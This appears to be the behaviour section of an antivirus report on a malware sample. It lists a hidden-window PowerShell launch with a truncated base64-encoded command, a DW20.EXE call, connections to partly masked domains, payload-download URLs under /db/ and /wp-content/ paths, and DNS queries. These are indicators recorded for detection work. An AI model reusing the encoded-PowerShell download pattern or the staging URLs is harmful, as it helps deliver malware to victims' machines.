Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBmAHcAbgBkAGcAaQBhAGMAaABkACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEsAbgBiAG4AeAB2AG4AYwB2AHkAIAAjAD4AIAAkAFQAZgBzAHcAagBkAHUAegB6AHEAPQAnAEMAagBy...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3560
- 'kp###rowave.com':80
- 'ta#####doanhnhan.com':80
- 'ta#####doanhnhan.com':443
- http://www.kp###rowave.com/db/qzwc80400/
- http://ta#####doanhnhan.com/wp-content/234y79856/
- 'ta#####doanhnhan.com':443
- DNS ASK te##.#cht-leben.com
- DNS ASK wp.######eurbookingsoftware.com
- DNS ASK ne#.##luonline.com
- DNS ASK kp###rowave.com
- DNS ASK ta#####doanhnhan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAATwBmAHcAbgBkAGcAaQBhAGMAaABkACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAEsAbgBiAG4AeAB2AG4AYwB2AHkAIAAjAD4AIAAkAFQAZgBzAHcAagBkAHUAegB6AHEAPQAnAEMAagBy... (со скрытым окном)